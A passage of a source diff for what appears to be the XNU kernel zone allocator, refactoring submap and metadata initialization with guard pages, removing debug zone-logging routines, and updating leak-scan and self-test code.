+       kr = kmem_suballoc(kernel_map, submap_min, submap_size,
+           FALSE, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE, vmk_flags,
+           VM_KERN_MEMORY_ZONE, &submap);
        if (kr != KERN_SUCCESS) {
-               return kr;
+               panic("kmem_suballoc(kernel_map[%d] %p:%p) failed: %d",
+                   idx, (void *)submap_start, (void *)submap_end, kr);
        }
-       names = (mach_zone_name_t *) names_addr;
 
-       zone_ptr = ZONE_NULL;
-       logged_zones = 0;
-       for (i = 0; i < max_zones; i++) {
-               zone_t z = &(zone_array[i]);
-               assert(z != ZONE_NULL);
+#if DEBUG || DEVELOPMENT
+       printf("zone_init: submap[%d] %p:%p (%zuM)\n",
+           idx, (void *)submap_start, (void *)submap_end,
+           (size_t)submap_size >> 20);
+#endif /* DEBUG || DEVELOPMENT */
 
-               /* Copy out the zone name if zone logging is enabled */
-               if (z->zlog_btlog) {
-                       get_zone_info(z, &names[logged_zones], NULL);
-                       logged_zones++;
-               }
+       zone_init_allocate_va(submap_end, guard_size,
+           ZIA_PERMANENT | ZIA_GUARD | ZIA_REPLACE);
+
+       zone_submaps[idx] = submap;
+       *submap_min       = submap_end + guard_size;
+       *remaining_size  -= submap_size;
+       *remaining_denom -= zone_sub_map_numer;
+}
+
+/*
+ * Allocate metadata array and migrate foreign initial metadata.
+ *
+ * So that foreign pages and native pages have the same scheme,
+ * we allocate VA space that covers both foreign and native pages.
+ */
+__startup_func
+static void
+zone_metadata_init(void)
+{
+       struct zone_map_range r0 = zone_info.zi_map_range[0];
+       struct zone_map_range r1 = zone_info.zi_map_range[1];
+       struct zone_map_range mr, br;
+       vm_size_t meta_size, bits_size, foreign_base;
+       vm_offset_t hstart, hend;
+
+       if (r0.min_address > r1.min_address) {
+               r0 = zone_info.zi_map_range[1];
+               r1 = zone_info.zi_map_range[0];
        }
 
-       *namesp = (mach_zone_name_t *) create_vm_map_copy(names_addr, names_size, logged_zones * sizeof *names);
-       *namesCntp = logged_zones;
+       meta_size = round_page(atop(r1.max_address - r0.min_address) *
+           sizeof(struct zone_page_metadata)) + ZONE_GUARD_SIZE * 2;
 
-       return KERN_SUCCESS;
+       /*
+        * Allocations can't be smaller than 8 bytes, which is 128b / 16B per 1k
+        * of physical memory (16M per 1G).
+        *
+        * Let's preallocate for the worst to avoid weird panics.
+        */
+       bits_size = round_page(16 * (ptoa(zone_phys_mapped_max_pages) >> 10));
 
-#else /* ZONE_ENABLE_LOGGING */
-#pragma unused(host, namesp, namesCntp)
-       return KERN_FAILURE;
-#endif /* ZONE_ENABLE_LOGGING */
-}
+       /*
+        * Compute the size of the "hole" in the middle of the range.
+        *
+        * If it is smaller than 256k, just leave it be, with this layout:
+        *
+        *   [G][ r0 meta ][ hole ][ r1 meta ][ bits ][G]
+        *
+        * else punch a hole with guard pages around the hole, and place the
+        * bits in the hole if it fits, or after r1 otherwise, yielding either
+        * of the following layouts:
+        *
+        *      |__________________hend____________|
+        *      |__hstart_|                        |
+        *   [G][ r0 meta ][ bits ][G]..........[G][ r1 meta ][G]
+        *   [G][ r0 meta ][G]..................[G][ r1 meta ][ bits ][G]
+        */
+       hstart = round_page(atop(r0.max_address - r0.min_address) *
+           sizeof(struct zone_page_metadata));
+       hend = trunc_page(atop(r1.min_address - r0.min_address) *
+           sizeof(struct zone_page_metadata));
+
+       if (hstart >= hend || hend - hstart < (256ul << 10)) {
+               mr = zone_init_allocate_va(0, meta_size + bits_size,
+                   ZIA_PERMANENT | ZIA_RANDOM);
+               mr.min_address += ZONE_GUARD_SIZE;
+               mr.max_address -= ZONE_GUARD_SIZE;
+               br.max_address  = mr.max_address;
+               mr.max_address -= bits_size;
+               br.min_address  = mr.max_address;
 
-kern_return_t
-mach_zone_get_btlog_records(
-       host_priv_t                             host,
-       mach_zone_name_t                name,
-       zone_btrecord_array_t   *recsp,
-       mach_msg_type_number_t  *recsCntp)
-{
 #if DEBUG || DEVELOPMENT
-       unsigned int numrecs = 0;
-       zone_btrecord_t *recs;
-       kern_return_t kr;
-       zone_t zone_ptr;
-       vm_offset_t recs_addr;
-       vm_size_t recs_size;
+               printf("zone_init: metadata  %p:%p (%zuK)\n",
+                   (void *)mr.min_address, (void *)mr.max_address,
+                   (size_t)zone_range_size(&mr) >> 10);
+               printf("zone_init: metabits  %p:%p (%zuK)\n",
+                   (void *)br.min_address, (void *)br.max_address,
+                   (size_t)zone_range_size(&br) >> 10);
+#endif /* DEBUG || DEVELOPMENT */
+       } else {
+               vm_size_t size, alloc_size = meta_size;
+               vm_offset_t base;
+               bool bits_in_middle = true;
 
-       if (host == HOST_NULL) {
-               return KERN_INVALID_HOST;
-       }
+               if (hend - hstart - 2 * ZONE_GUARD_SIZE < bits_size) {
+                       alloc_size += bits_size;
+                       bits_in_middle = false;
+               }
 
-       if (recsp == NULL || recsCntp == NULL) {
-               return KERN_INVALID_ARGUMENT;
-       }
+               mr = zone_init_allocate_va(0, alloc_size, ZIA_RANDOM);
+
+               base = mr.min_address;
+               size = ZONE_GUARD_SIZE + hstart + ZONE_GUARD_SIZE;
+               if (bits_in_middle) {
+                       size += bits_size;
+                       br.min_address = base + ZONE_GUARD_SIZE + hstart;
+                       br.max_address = br.min_address + bits_size;
+               }
+               zone_init_allocate_va(base, size, ZIA_PERMANENT | ZIA_REPLACE);
 
-       zone_ptr = ZONE_NULL;
-       zone_index_foreach(i) {
-               zone_t z = &zone_array[i];
+               base += size;
+               size = mr.min_address + hend - base;
+               kmem_free(kernel_map, base, size);
 
-               /*
-                * Append kalloc heap name to zone name (if zone is used by kalloc)
-                */
-               char temp_zone_name[MAX_ZONE_NAME] = "";
-               snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s",
-                   zone_heap_name(z), z->z_name);
+               base = mr.min_address + hend;
+               size = mr.max_address - base;
+               zone_init_allocate_va(base, size, ZIA_PERMANENT | ZIA_REPLACE);
 
-               /* Find the requested zone by name */
-               if (track_this_zone(temp_zone_name, name.mzn_name)) {
-                       zone_ptr = z;
-                       break;
+               mr.min_address += ZONE_GUARD_SIZE;
+               mr.max_address -= ZONE_GUARD_SIZE;
+               if (!bits_in_middle) {
+                       br.max_address  = mr.max_address;
+                       mr.max_address -= bits_size;
+                       br.min_address  = mr.max_address;
                }
+
+#if DEBUG || DEVELOPMENT
+               printf("zone_init: metadata0 %p:%p (%zuK)\n",
+                   (void *)mr.min_address, (void *)(mr.min_address + hstart),
+                   (size_t)hstart >> 10);
+               printf("zone_init: metadata1 %p:%p (%zuK)\n",
+                   (void *)(mr.min_address + hend), (void *)mr.max_address,
+                   (size_t)(zone_range_size(&mr) - hend) >> 10);
+               printf("zone_init: metabits  %p:%p (%zuK)\n",
+                   (void *)br.min_address, (void *)br.max_address,
+                   (size_t)zone_range_size(&br) >> 10);
+#endif /* DEBUG || DEVELOPMENT */
        }
 
-       /* No zones found with the requested zone name */
-       if (zone_ptr == ZONE_NULL) {
-               return KERN_INVALID_ARGUMENT;
+       br.min_address = (br.min_address + ZBA_CHUNK_SIZE - 1) & -ZBA_CHUNK_SIZE;
+       br.max_address = br.max_address & -ZBA_CHUNK_SIZE;
+
+       zone_info.zi_meta_range = mr;
+       zone_info.zi_bits_range = br;
+
+       /*
+        * Migrate the original static metadata into its new location.
+        */
+       zone_info.zi_meta_base = (struct zone_page_metadata *)mr.min_address -
+           zone_pva_from_addr(r0.min_address).packed_address;
+       foreign_base = zone_info.zi_map_range[ZONE_ADDR_FOREIGN].min_address;
+       zone_meta_populate(foreign_base, zone_foreign_size());
+       memcpy(zone_meta_from_addr(foreign_base),
+           zone_foreign_meta_array_startup,
+           atop(zone_foreign_size()) * sizeof(struct zone_page_metadata));
+
+       zba_populate(0);
+       memcpy(zba_base_header(), zba_chunk_startup,
+           sizeof(zba_chunk_startup));
+}
+
+/* Global initialization of Zone Allocator.
+ * Runs after zone_bootstrap.
+ */
+__startup_func
+static void
+zone_init(void)
+{
+       vm_size_t       zone_map_size;
+       vm_size_t       remaining_size;
+       vm_offset_t     submap_min = 0;
+       uint64_t        denom = 0;
+       uint64_t        submap_ratios[Z_SUBMAP_IDX_COUNT] = {
+#ifdef __LP64__
+               [Z_SUBMAP_IDX_VA_RESTRICTED] = 20,
+#else
+               [Z_SUBMAP_IDX_VA_RESERVE]    = 10,
+#endif /* defined(__LP64__) */
+               [Z_SUBMAP_IDX_GENERAL]       = 40,
+               [Z_SUBMAP_IDX_BAG_OF_BYTES]  = 40,
+       };
+
+       if (ZSECURITY_OPTIONS_SUBMAP_USER_DATA & zsecurity_options) {
+               zone_last_submap_idx = Z_SUBMAP_IDX_BAG_OF_BYTES;
+       } else {
+               zone_last_submap_idx = Z_SUBMAP_IDX_GENERAL;
        }
+       zone_phys_mapped_max_pages = (uint32_t)atop(zone_phys_size_max());
 
-       /* Logging not turned on for the requested zone */
-       if (!DO_LOGGING(zone_ptr)) {
-               return KERN_FAILURE;
+       for (unsigned idx = 0; idx <= zone_last_submap_idx; idx++) {
+#if DEBUG || DEVELOPMENT
+               char submap_name[1 + sizeof("submap")];
+               snprintf(submap_name, sizeof(submap_name), "submap%d", idx);
+               PE_parse_boot_argn(submap_name, &submap_ratios[idx], sizeof(uint64_t));
+#endif
+               denom += submap_ratios[idx];
        }
 
-       /* Allocate memory for btlog records */
-       numrecs = (unsigned int)(get_btlog_records_count(zone_ptr->zlog_btlog));
-       recs_size = round_page(numrecs * sizeof *recs);
+#if __LP64__
+       zone_map_size = ZONE_MAP_VIRTUAL_SIZE_LP64;
+#else
+       zone_map_size = ptoa(zone_phys_mapped_max_pages *
+           (denom + submap_ratios[Z_SUBMAP_IDX_VA_RESERVE]) / denom);
+#endif
 
-       kr = kmem_alloc_pageable(ipc_kernel_map, &recs_addr, recs_size, VM_KERN_MEMORY_IPC);
-       if (kr != KERN_SUCCESS) {
-               return kr;
-       }
+       remaining_size = zone_map_size -
+           ZONE_GUARD_SIZE * (zone_last_submap_idx + 1);
 
        /*
-        * We will call get_btlog_records() below which populates this region while holding a spinlock
-        * (the btlog lock). So these pages need to be wired.
+        * And now allocate the various pieces of VA and submaps.
+        *
+        * Make a first allocation of contiguous VA, that we'll deallocate,
+        * and we'll carve-out memory in that range again linearly.
+        * The kernel is stil single threaded at this stage.
         */
-       kr = vm_map_wire_kernel(ipc_kernel_map, recs_addr, recs_addr + recs_size,
-           VM_PROT_READ | VM_PROT_WRITE, VM_KERN_MEMORY_IPC, FALSE);
-       assert(kr == KERN_SUCCESS);
-
-       recs = (zone_btrecord_t *)recs_addr;
-       get_btlog_records(zone_ptr->zlog_btlog, recs, &numrecs);
-
-       kr = vm_map_unwire(ipc_kernel_map, recs_addr, recs_addr + recs_size, FALSE);
-       assert(kr == KERN_SUCCESS);
 
-       *recsp = (zone_btrecord_t *) create_vm_map_copy(recs_addr, recs_size, numrecs * sizeof *recs);
-       *recsCntp = numrecs;
+       struct zone_map_range *map_range =
+           &zone_info.zi_map_range[ZONE_ADDR_NATIVE];
 
-       return KERN_SUCCESS;
+       *map_range = zone_init_allocate_va(0, zone_map_size, ZIA_NONE);
+       submap_min = map_range->min_address;
 
-#else /* DEBUG || DEVELOPMENT */
-#pragma unused(host, name, recsp, recsCntp)
-       return KERN_FAILURE;
-#endif /* DEBUG || DEVELOPMENT */
-}
+       /*
+        * Allocate the submaps
+        */
+       for (unsigned idx = 0; idx <= zone_last_submap_idx; idx++) {
+               zone_submap_init(&submap_min, idx, submap_ratios[idx],
+                   &denom, &remaining_size, ZONE_GUARD_SIZE);
+       }
 
+       assert(submap_min == map_range->max_address);
 
-#if DEBUG || DEVELOPMENT
+       zone_metadata_init();
 
-kern_return_t
-mach_memory_info_check(void)
-{
-       mach_memory_info_t * memory_info;
-       mach_memory_info_t * info;
-       unsigned int         num_info;
-       vm_offset_t          memory_info_addr;
-       kern_return_t        kr;
-       size_t               memory_info_size, memory_info_vmsize;
-       uint64_t             top_wired, zonestotal, total;
+#if VM_MAX_TAG_ZONES
+       if (zone_tagging_on) {
+               zone_tagging_init(zone_map_size);
+       }
+#endif
+#if CONFIG_GZALLOC
+       gzalloc_init(zone_map_size);
+#endif
 
-       num_info = vm_page_diagnose_estimate();
-       memory_info_size = num_info * sizeof(*memory_info);
-       memory_info_vmsize = round_page(memory_info_size);
-       kr = kmem_alloc(kernel_map, &memory_info_addr, memory_info_vmsize, VM_KERN_MEMORY_DIAG);
-       assert(kr == KERN_SUCCESS);
+       zone_create_flags_t kma_flags = ZC_NOCACHING |
+           ZC_NOGC | ZC_NOENCRYPT | ZC_NOGZALLOC | ZC_NOCALLOUT |
+           ZC_KASAN_NOQUARANTINE | ZC_KASAN_NOREDZONE;
 
-       memory_info = (mach_memory_info_t *) memory_info_addr;
-       vm_page_diagnose(memory_info, num_info, 0);
+       (void)zone_create_ext("vm.permanent", 1, kma_flags,
+           ZONE_ID_PERMANENT, ^(zone_t z){
+               z->z_permanent = true;
+               z->z_elem_size = 1;
+#if defined(__LP64__)
+               z->z_submap_idx = Z_SUBMAP_IDX_VA_RESTRICTED;
+#endif
+       });
+       (void)zone_create_ext("vm.permanent.percpu", 1, kma_flags | ZC_PERCPU,
+           ZONE_ID_PERCPU_PERMANENT, ^(zone_t z){
+               z->z_permanent = true;
+               z->z_elem_size = 1;
+#if defined(__LP64__)
+               z->z_submap_idx = Z_SUBMAP_IDX_VA_RESTRICTED;
+#endif
+       });
 
-       top_wired = total = zonestotal = 0;
+       /*
+        * Now migrate the startup statistics into their final storage.
+        */
+       int cpu = cpu_number();
        zone_index_foreach(idx) {
-               zonestotal += zone_size_wired(&zone_array[idx]);
-       }
+               zone_t tz = &zone_array[idx];
 
-       for (uint32_t idx = 0; idx < num_info; idx++) {
-               info = &memory_info[idx];
-               if (!info->size) {
-                       continue;
-               }
-               if (VM_KERN_COUNT_WIRED == info->site) {
-                       top_wired = info->size;
-               }
-               if (VM_KERN_SITE_HIDE & info->flags) {
-                       continue;
-               }
-               if (!(VM_KERN_SITE_WIRED & info->flags)) {
-                       continue;
+               if (tz->z_stats == __zpcpu_mangle_for_boot(&zone_stats_startup[idx])) {
+                       zone_stats_t zs = zalloc_percpu_permanent_type(struct zone_stats);
+
+                       *zpercpu_get_cpu(zs, cpu) = *zpercpu_get_cpu(tz->z_stats, cpu);
+                       tz->z_stats = zs;
+#if ZONE_ENABLE_LOGGING
+                       if (tz->zone_logging && !tz->zlog_btlog) {
+                               zone_enable_logging(tz);
+                       }
+#endif /* ZONE_ENABLE_LOGGING */
                }
-               total += info->size;
        }
-       total += zonestotal;
 
-       printf("vm_page_diagnose_check %qd of %qd, zones %qd, short 0x%qx\n",
-           total, top_wired, zonestotal, top_wired - total);
-
-       kmem_free(kernel_map, memory_info_addr, memory_info_vmsize);
+#if CONFIG_ZLEAKS
+       /*
+        * Initialize the zone leak monitor
+        */
+       zleak_init(zone_map_size);
+#endif /* CONFIG_ZLEAKS */
 
-       return kr;
+#if VM_MAX_TAG_ZONES
+       if (zone_tagging_on) {
+               vm_allocation_zones_init();
+       }
+#endif
 }
+STARTUP(ZALLOC, STARTUP_RANK_FIRST, zone_init);
 
-extern boolean_t(*volatile consider_buffer_cache_collect)(int);
+__startup_func
+static void
+zone_cache_bootstrap(void)
+{
+       zone_t magzone;
 
-#endif /* DEBUG || DEVELOPMENT */
+       magzone = zone_create("zcc_magazine_zone", sizeof(struct zone_magazine) +
+           zc_mag_size() * sizeof(zone_element_t),
+           ZC_NOGZALLOC | ZC_KASAN_NOREDZONE | ZC_KASAN_NOQUARANTINE |
+           ZC_SEQUESTER | ZC_CACHING | ZC_ZFREE_CLEARMEM);
+       magzone->z_elems_rsv = (uint16_t)(2 * zpercpu_count());
 
-kern_return_t
-mach_zone_force_gc(
-       host_t host)
-{
-       if (host == HOST_NULL) {
-               return KERN_INVALID_HOST;
-       }
+       os_atomic_store(&zc_magazine_zone, magzone, compiler_acq_rel);
 
-#if DEBUG || DEVELOPMENT
-       /* Callout to buffer cache GC to drop elements in the apfs zones */
-       if (consider_buffer_cache_collect != NULL) {
-               (void)(*consider_buffer_cache_collect)(0);
+       /*
+        * Now that we are initialized, we can enable zone caching for zones that
+        * were made before zcache_bootstrap() was called.
+        *
+        * The system is still single threaded so we don't need to take the lock.
+        */
+       zone_index_foreach(i) {
+               zone_t z = &zone_array[i];
+               if (z->z_pcpu_cache) {
+                       z->z_pcpu_cache = NULL;
+                       zone_enable_caching(z);
+               }
        }
-       consider_zone_gc(FALSE);
-#endif /* DEBUG || DEVELOPMENT */
-       return KERN_SUCCESS;
 }
+STARTUP(ZALLOC, STARTUP_RANK_FOURTH, zone_cache_bootstrap);
 
-zone_t
-zone_find_largest(void)
+void
+zalloc_first_proc_made(void)
 {
-       uint32_t    largest_idx  = 0;
-       vm_offset_t largest_size = zone_size_wired(&zone_array[0]);
+       zone_caching_disabled = 0;
+}
 
-       zone_index_foreach(i) {
-               vm_offset_t size = zone_size_wired(&zone_array[i]);
-               if (size > largest_size) {
-                       largest_idx = i;
-                       largest_size = size;
-               }
+__startup_func
+vm_offset_t
+zone_foreign_mem_init(vm_size_t size)
+{
+       vm_offset_t mem;
+
+       if (atop(size) > ZONE_FOREIGN_META_INLINE_COUNT) {
+               panic("ZONE_FOREIGN_META_INLINE_COUNT has become too small: "
+                   "%d > %d", (int)atop(size), ZONE_FOREIGN_META_INLINE_COUNT);
        }
 
-       return &zone_array[largest_idx];
+       mem = (vm_offset_t)pmap_steal_memory(size);
+
+       zone_info.zi_meta_base = zone_foreign_meta_array_startup -
+           zone_pva_from_addr(mem).packed_address;
+       zone_info.zi_map_range[ZONE_ADDR_FOREIGN].min_address = mem;
+       zone_info.zi_map_range[ZONE_ADDR_FOREIGN].max_address = mem + size;
+
+       zone_info.zi_bits_range = (struct zone_map_range){
+               .min_address = (vm_offset_t)zba_chunk_startup,
+               .max_address = (vm_offset_t)zba_chunk_startup +
+           sizeof(zba_chunk_startup),
+       };
+       zba_init_chunk(0);
+
+       return mem;
 }
 
+#endif /* !ZALLOC_TEST */
 #pragma mark - tests
 #if DEBUG || DEVELOPMENT
 
@@ -6150,37 +8577,42 @@ zone_find_largest(void)
  * a second zinit() comes through before zdestroy()),  which could lead us to
  * run out of zones.
  */
-SIMPLE_LOCK_DECLARE(zone_test_lock, 0);
+static SIMPLE_LOCK_DECLARE(zone_test_lock, 0);
 static boolean_t zone_test_running = FALSE;
 static zone_t test_zone_ptr = NULL;
 
 static uintptr_t *
-zone_copy_allocations(zone_t z, uintptr_t *elems, bitmap_t *bits,
-    zone_pva_t page_index, zone_addr_kind_t kind)
+zone_copy_allocations(zone_t z, uintptr_t *elems, zone_pva_t page_index)
 {
-       vm_offset_t free, first, end, page;
+       vm_offset_t elem_size = zone_elem_size(z);
+       vm_offset_t base;
        struct zone_page_metadata *meta;
 
        while (!zone_pva_is_null(page_index)) {
-               page  = zone_pva_to_addr(page_index);
-               meta  = zone_pva_to_meta(page_index, kind);
-               end   = page + ptoa(meta->zm_percpu ? 1 : meta->zm_page_count);
-               first = page + ZONE_PAGE_FIRST_OFFSET(kind);
+               base  = zone_pva_to_addr(page_index);
+               meta  = zone_pva_to_meta(page_index);
 
-               bitmap_clear(bits, (uint32_t)((end - first) / zone_elem_size(z)));
+               if (meta->zm_inline_bitmap) {
+                       for (size_t i = 0; i < meta->zm_chunk_len; i++) {
+                               uint32_t map = meta[i].zm_bitmap;
 
-               // construct bitmap of all freed elements
-               free = zone_page_meta_get_freelist(z, meta, page);
-               while (free) {
-                       bitmap_set(bits, (uint32_t)((free - first) / zone_elem_size(z)));
-
-                       // next free element
-                       free = *(vm_offset_t *)free ^ zp_nopoison_cookie;
-               }
-
-               for (unsigned i = 0; first < end; i++, first += zone_elem_size(z)) {
-                       if (!bitmap_test(bits, i)) {
-                               *elems++ = INSTANCE_PUT(first);
+                               for (; map; map &= map - 1) {
+                                       *elems++ = INSTANCE_PUT(base +
+                                           elem_size * __builtin_clz(map));
+                               }
+                               base += elem_size * 32;
+                       }
+               } else {
+                       uint32_t order = zba_bits_ref_order(meta->zm_bitmap);
+                       bitmap_t *bits = zba_bits_ref_ptr(meta->zm_bitmap);
+                       for (size_t i = 0; i < (1u << order); i++) {
+                               uint64_t map = bits[i];
+
+                               for (; map; map &= map - 1) {
+                                       *elems++ = INSTANCE_PUT(base +
+                                           elem_size * __builtin_clzll(map));
+                               }
+                               base += elem_size * 64;
                        }
                }
 
@@ -6200,13 +8632,12 @@ zone_leaks(const char * zoneName, uint32_t nameLen, leak_site_proc proc, void *
        uint32_t      idx, count, found;
        uint32_t      btidx, btcount, nobtcount, btfound;
        uint32_t      elemSize;
-       uint64_t      maxElems;
+       size_t        maxElems;
        kern_return_t kr;
-       bitmap_t     *bits;
 
-       zone_index_foreach(i) {
-               if (!strncmp(zoneName, zone_array[i].z_name, nameLen)) {
-                       zone = &zone_array[i];
+       zone_foreach(z) {
+               if (!strncmp(zoneName, z->z_name, nameLen)) {
+                       zone = z;
                        break;
                }
        }
@@ -6214,40 +8645,30 @@ zone_leaks(const char * zoneName, uint32_t nameLen, leak_site_proc proc, void *
                return KERN_INVALID_NAME;
        }
 
-       elemSize = zone_elem_size(zone);
-       maxElems = (zone->countavail + 1) & ~1ul;
+       elemSize = (uint32_t)zone_elem_size(zone);
+       maxElems = (zone->z_elems_avail + 1) & ~1ul;
 
-       if ((ptoa(zone->percpu ? 1 : zone->alloc_pages) % elemSize) &&
+       if ((ptoa(zone->z_percpu ? 1 : zone->z_chunk_pages) % elemSize) &&
            !zone_leaks_scan_enable) {
                return KERN_INVALID_CAPABILITY;
        }
 
        kr = kmem_alloc_kobject(kernel_map, (vm_offset_t *) &array,
-           maxElems * sizeof(uintptr_t) + BITMAP_LEN(ZONE_CHUNK_MAXELEMENTS),
-           VM_KERN_MEMORY_DIAG);
+           maxElems * sizeof(uintptr_t), VM_KERN_MEMORY_DIAG);
        if (KERN_SUCCESS != kr) {
                return kr;
        }
 
-       /* maxElems is a 2-multiple so we're always aligned */
-       bits = CAST_DOWN_EXPLICIT(bitmap_t *, array + maxElems);
-
-       lock_zone(zone);
+       zone_lock(zone);
 
        next = array;
-       next = zone_copy_allocations(zone, next, bits,
-           zone->pages_any_free_foreign, ZONE_ADDR_FOREIGN);
-       next = zone_copy_allocations(zone, next, bits,
-           zone->pages_all_used_foreign, ZONE_ADDR_FOREIGN);
-       next = zone_copy_allocations(zone, next, bits,
-           zone->pages_intermediate, ZONE_ADDR_NATIVE);
-       next = zone_copy_allocations(zone, next, bits,
-           zone->pages_all_used, ZONE_ADDR_NATIVE);
+       next = zone_copy_allocations(zone, next, zone->z_pageq_partial);
+       next = zone_copy_allocations(zone, next, zone->z_pageq_full);
        count = (uint32_t)(next - array);
 
-       unlock_zone(zone);
+       zone_unlock(zone);
 
-       zone_leaks_scan(array, count, zone_elem_size(zone), &found);
+       zone_leaks_scan(array, count, (uint32_t)zone_elem_size(zone), &found);
        assert(found <= count);
 
        for (idx = 0; idx < count; idx++) {
@@ -6310,6 +8731,8 @@ run_zone_test(void)
        unsigned int i = 0, max_iter = 5;
        void * test_ptr;
        zone_t test_zone;
+       zone_t test_pcpu_zone;
+       kern_return_t kr;
 
        simple_lock(&zone_test_lock, &zone_locks_grp);
        if (!zone_test_running) {
@@ -6332,9 +8755,9 @@ run_zone_test(void)
                }
 
 #if KASAN_ZALLOC
-               if (test_zone_ptr == NULL && test_zone->countfree != 0) {
+               if (test_zone_ptr == NULL && test_zone->z_elems_free != 0) {
 #else
-               if (test_zone->countfree != 0) {
+               if (test_zone->z_elems_free != 0) {
 #endif
                        printf("run_zone_test: free count is not zero\n");
                        return FALSE;
@@ -6367,15 +8790,16 @@ run_zone_test(void)
                int idx, num_allocs = 8;
                vm_size_t elem_size = 2 * PAGE_SIZE / num_allocs;
                void *allocs[num_allocs];
-               vm_offset_t phys_pages = os_atomic_load(&zones_phys_page_count, relaxed);
-               vm_size_t zone_map_size = zone_range_size(&zone_info.zi_map_range);
+               void **allocs_pcpu;
+               vm_offset_t phys_pages = os_atomic_load(&zones_phys_page_mapped_count, relaxed);
 
                test_zone = zone_create("test_zone_sysctl", elem_size,
                    ZC_DESTRUCTIBLE | ZC_SEQUESTER);
-               if (test_zone == NULL) {
-                       printf("run_zone_test: zinit() failed\n");
-                       return FALSE;
-               }
+               assert(test_zone);
+
+               test_pcpu_zone = zone_create("test_zone_sysctl.pcpu", sizeof(uint64_t),
+                   ZC_DESTRUCTIBLE | ZC_SEQUESTER | ZC_PERCPU);
+               assert(test_pcpu_zone);
 
                for (idx = 0; idx < num_allocs; idx++) {
                        allocs[idx] = zalloc(test_zone);
@@ -6385,63 +8809,105 @@ run_zone_test(void)
                for (idx = 0; idx < num_allocs; idx++) {
                        zfree(test_zone, allocs[idx]);
                }
-               assert(!zone_pva_is_null(test_zone->pages_all_free));
+               assert(!zone_pva_is_null(test_zone->z_pageq_empty));
+
+               kr = kernel_memory_allocate(kernel_map,
+                   (vm_address_t *)&allocs_pcpu, PAGE_SIZE,
+                   0, KMA_ZERO | KMA_KOBJECT, VM_KERN_MEMORY_DIAG);
+               assert(kr == KERN_SUCCESS);
+
+               for (idx = 0; idx < PAGE_SIZE / sizeof(uint64_t); idx++) {
+                       allocs_pcpu[idx] = zalloc_percpu(test_pcpu_zone,
+                           Z_WAITOK | Z_ZERO);
+                       assert(NULL != allocs_pcpu[idx]);
+               }
+               for (idx = 0; idx < PAGE_SIZE / sizeof(uint64_t); idx++) {
+                       zfree_percpu(test_pcpu_zone, allocs_pcpu[idx]);
+               }
+               assert(!zone_pva_is_null(test_pcpu_zone->z_pageq_empty));
 
-               printf("vm_page_wire_count %d, vm_page_free_count %d, p to v %qd%%\n",
+               printf("vm_page_wire_count %d, vm_page_free_count %d, p to v %ld%%\n",
                    vm_page_wire_count, vm_page_free_count,
-                   (100ULL * ptoa_64(phys_pages)) / zone_map_size);
-               zone_gc(FALSE);
-               printf("vm_page_wire_count %d, vm_page_free_count %d, p to v %qd%%\n",
+                   100L * phys_pages / zone_phys_mapped_max_pages);
+               zone_gc(ZONE_GC_DRAIN);
+               printf("vm_page_wire_count %d, vm_page_free_count %d, p to v %ld%%\n",
                    vm_page_wire_count, vm_page_free_count,
-                   (100ULL * ptoa_64(phys_pages)) / zone_map_size);
+                   100L * phys_pages / zone_phys_mapped_max_pages);
+
                unsigned int allva = 0;
-               zone_index_foreach(zidx) {
-                       zone_t z = &zone_array[zidx];
-                       lock_zone(z);
-                       allva += z->page_count;
-                       if (!z->sequester_page_count) {
-                               unlock_zone(z);
+
+               zone_foreach(z) {
+                       zone_lock(z);
+                       allva += z->z_wired_cur;
+                       if (zone_pva_is_null(z->z_pageq_va)) {
+                               zone_unlock(z);
                                continue;
                        }
                        unsigned count = 0;
                        uint64_t size;
-                       zone_pva_t pg = z->pages_sequester;
+                       zone_pva_t pg = z->z_pageq_va;
                        struct zone_page_metadata *page_meta;
                        while (pg.packed_address) {
-                               page_meta = zone_pva_to_meta(pg, ZONE_ADDR_NATIVE);
-                               count += z->alloc_pages;
+                               page_meta = zone_pva_to_meta(pg);
+                               count += z->z_percpu ? 1 : z->z_chunk_pages;
+                               if (page_meta->zm_chunk_len == ZM_SECONDARY_PAGE) {
+                                       count -= page_meta->zm_page_index;
+                               }
                                pg = page_meta->zm_page_next;
                        }
-                       assert(count == z->sequester_page_count);
+                       assert(z->z_wired_cur + count == z->z_va_cur);
                        size = zone_size_wired(z);
                        if (!size) {
                                size = 1;
                        }
                        printf("%s%s: seq %d, res %d, %qd %%\n",
-                           zone_heap_name(z), z->z_name, z->sequester_page_count,
-                           z->page_count, zone_size_allocated(z) * 100ULL / size);
-                       unlock_zone(z);
+                           zone_heap_name(z), z->z_name, z->z_va_cur - z->z_wired_cur,
+                           z->z_wired_cur, zone_size_allocated(z) * 100ULL / size);
+                       zone_unlock(z);
                }
 
                printf("total va: %d\n", allva);
 
-               assert(zone_pva_is_null(test_zone->pages_all_free));
-               assert(!zone_pva_is_null(test_zone->pages_sequester));
-               assert(2 == test_zone->sequester_page_count);
+               assert(zone_pva_is_null(test_zone->z_pageq_empty));
+               assert(zone_pva_is_null(test_zone->z_pageq_partial));
+               assert(!zone_pva_is_null(test_zone->z_pageq_va));
+               assert(zone_pva_is_null(test_pcpu_zone->z_pageq_empty));
+               assert(zone_pva_is_null(test_pcpu_zone->z_pageq_partial));
+               assert(!zone_pva_is_null(test_pcpu_zone->z_pageq_va));
+
                for (idx = 0; idx < num_allocs; idx++) {
                        assert(0 == pmap_find_phys(kernel_pmap, (addr64_t)(uintptr_t) allocs[idx]));
                }
+
+               /* make sure the zone is still usable after a GC */
+
                for (idx = 0; idx < num_allocs; idx++) {
                        allocs[idx] = zalloc(test_zone);
                        assert(allocs[idx]);
                        printf("alloc[%d] %p\n", idx, allocs[idx]);
                }
-               assert(zone_pva_is_null(test_zone->pages_sequester));
-               assert(0 == test_zone->sequester_page_count);
+               assert(zone_pva_is_null(test_zone->z_pageq_va));
+               assert(test_zone->z_wired_cur == test_zone->z_va_cur);
                for (idx = 0; idx < num_allocs; idx++) {
                        zfree(test_zone, allocs[idx]);
                }
+
+               for (idx = 0; idx < PAGE_SIZE / sizeof(uint64_t); idx++) {
+                       allocs_pcpu[idx] = zalloc_percpu(test_pcpu_zone,
+                           Z_WAITOK | Z_ZERO);
+                       assert(NULL != allocs_pcpu[idx]);
+               }
+               for (idx = 0; idx < PAGE_SIZE / sizeof(uint64_t); idx++) {
+                       zfree_percpu(test_pcpu_zone, allocs_pcpu[idx]);
+               }
+
+               assert(!zone_pva_is_null(test_pcpu_zone->z_pageq_empty));
+               assert(zone_pva_is_null(test_pcpu_zone->z_pageq_va));
+
